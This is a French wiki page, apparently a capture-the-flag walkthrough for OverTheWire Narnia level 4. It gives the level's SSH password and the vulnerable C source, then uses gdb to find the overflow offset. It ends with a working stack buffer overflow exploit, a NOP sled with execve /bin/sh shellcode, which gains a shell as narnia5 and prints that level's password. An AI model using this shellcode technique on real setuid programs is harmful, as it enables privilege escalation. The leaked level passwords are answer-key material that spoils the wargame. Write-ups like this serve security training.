Zenk - Security

Outils d'utilisateurs

Outils du Site

Piste:
overthewire_narnia:level4

Différences

Cette page vous donne les différences entre la révision choisie et la version actuelle de la page.

Lien vers cette vue

overthewire_narnia:level4 [2017/04/09 15:33] (Version actuelle)
Ligne 1: Ligne 1:
 +====== Level 4 ======
 +
 +<code>
 +ssh narnia4@narnia.labs.overthewire.org
 +pass : thaenohtai
 +</code>
 +
 +<code C>
 +#include <string.h>
 +#include <stdlib.h>
 +#include <stdio.h>
 +#include <ctype.h>
 +
 +extern char **environ;
 +
 +int main(int argc,char **argv){
 + int i;
 + char buffer[256];
 +
 + for(i = 0; environ[i] != NULL; i++)
 + memset(environ[i], '\0', strlen(environ[i]));
 +
 + if(argc>1)
 + strcpy(buffer,argv[1]);
 +
 + return 0;
 +}
 +</code>
 +
 +Buffer stack overflow classique, si vous avez l'habitude d'utiliser les variables d'environnement pour mettre votre shellcode cela ne va pas être possible ici : il est entièrement mis à ''NULL'' ! On va donc mettre directement notre shellcode dans ''buffer'' et sauter dessus :)
 +
 +<code ASM>
 +gdb$ r $(python -c 'print "\xcc"*272+"BBBB"')
 +
 +Program received signal SIGSEGV, Segmentation fault.
 +--------------------------------------------------------------------------[regs]
 +  EAX: 00000000  EBX: F7FD2FF4  ECX: 00000000  EDX: FFFFD919  o d I t s Z a P c 
 +  ESI: 00000000  EDI: 00000000  EBP: CCCCCCCC  ESP: FFFFD620  EIP: 42424242
 +  CS: 0023  DS: 002B  ES: 002B  FS: 0000  GS: 0063  SS: 002BError while running hook_stop:
 +Cannot access memory at address 0x42424242
 +0x42424242 in ?? ()
 +gdb$ x/200x $esp
 +0xffffd620: 0x00000000 0xffffd6c4 0xffffd6d0 0xf7fdf420
 +0xffffd630: 0xffffffff 0xf7ffcff4 0x0804827a 0x00000001
 +0xffffd640: 0xffffd680 0xf7fedd61 0xf7ffdad0 0xf7fd72e8
 +0xffffd650: 0x00000001 0xf7fd2ff4 0x00000000 0x00000000
 +0xffffd660: 0xffffd698 0x5326f6a1 0x7db14eb1 0x00000000
 +0xffffd670: 0x00000000 0x00000000 0x00000002 0x080483a0
 +0xffffd680: 0x00000000 0xf7ff3f70 0xf7e89d5b 0xf7ffcff4
 +0xffffd690: 0x00000002 0x080483a0 0x00000000 0x080483c1
 +0xffffd6a0: 0x08048454 0x00000002 0xffffd6c4 0x08048500
 +0xffffd6b0: 0x08048560 0xf7feed80 0xffffd6bc 0xf7ffd918
 +0xffffd6c0: 0x00000002 0xffffd7f4 0xffffd804 0x00000000
 +0xffffd6d0: 0xffffd919 0xffffd929 0xffffd93d 0xffffd95e
 +0xffffd6e0: 0xffffd971 0xffffd984 0xffffd991 0xffffde81
 +0xffffd6f0: 0xffffde8c 0xffffde98 0xffffdee5 0xffffdefc
 +0xffffd700: 0xffffdf0b 0xffffdf17 0xffffdf28 0xffffdf31
 +0xffffd710: 0xffffdf44 0xffffdf4c 0xffffdf5c 0xffffdf71
 +0xffffd720: 0xffffdfa6 0xffffdfc6 0x00000000 0x00000020
 +0xffffd730: 0xf7fdf420 0x00000021 0xf7fdf000 0x00000010
 +0xffffd740: 0x17898175 0x00000006 0x00001000 0x00000011
 +0xffffd750: 0x00000064 0x00000003 0x08048034 0x00000004
 +0xffffd760: 0x00000020 0x00000005 0x00000007 0x00000007
 +0xffffd770: 0xf7fe0000 0x00000008 0x00000000 0x00000009
 +0xffffd780: 0x080483a0 0x0000000b 0x000036b4 0x0000000c
 +0xffffd790: 0x000036b4 0x0000000d 0x000036b4 0x0000000e
 +0xffffd7a0: 0x000036b4 0x00000017 0x00000000 0x00000019
 +0xffffd7b0: 0xffffd7db 0x0000001f 0xffffdfe8 0x0000000f
 +0xffffd7c0: 0xffffd7eb 0x00000000 0x00000000 0x00000000
 +0xffffd7d0: 0x00000000 0x00000000 0x08000000 0x5b4ce26c
 +0xffffd7e0: 0x85af5645 0x503435d7 0x69632138 0x00363836
 +0xffffd7f0: 0x00000000 0x706d742f 0x2f346e2f 0x6e72616e
 +0xffffd800: 0x00346169 0xcccccccc 0xcccccccc 0xcccccccc
 +0xffffd810: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
 +0xffffd820: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
 +0xffffd830: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
 +0xffffd840: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
 +0xffffd850: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
 +0xffffd860: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
 +0xffffd870: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
 +0xffffd880: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
 +0xffffd890: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
 +0xffffd8a0: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
 +0xffffd8b0: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
 +0xffffd8c0: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
 +0xffffd8d0: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
 +0xffffd8e0: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
 +0xffffd8f0: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
 +0xffffd900: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
 +0xffffd910: 0xcccccccc 0x42424242 0x00000000 0x00000000
 +</code>
 +
 +Nous pouvons donc par exemple sauter à l'adresse ''0xffffd830''.
 +
 +<code>
 +narnia4@melissa:/tmp/n4$ ./narnia4 $(python -c 'print "\x90"*239+"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80"+"\x30\xd8\xff\xff"')
 +bash-4.2$ id
 +uid=14004(narnia4) gid=14004(narnia4) euid=14005(narnia5) groups=14005(narnia5),14004(narnia4)
 +bash-4.2$ cat /etc/narnia_pass/narnia5
 +faimahchiy
 +</code>
  
overthewire_narnia/level4.txt · Dernière modification: 2017/04/09 15:33 (modification externe)

Outils de la Page

Sauf mention contraire, le contenu de ce wiki est placé sous la licence suivante : CC Attribution-Share Alike 3.0 Unported
CC Attribution-Share Alike 3.0 Unported Donate Powered by PHP Valid HTML5 Valid CSS Driven by DokuWiki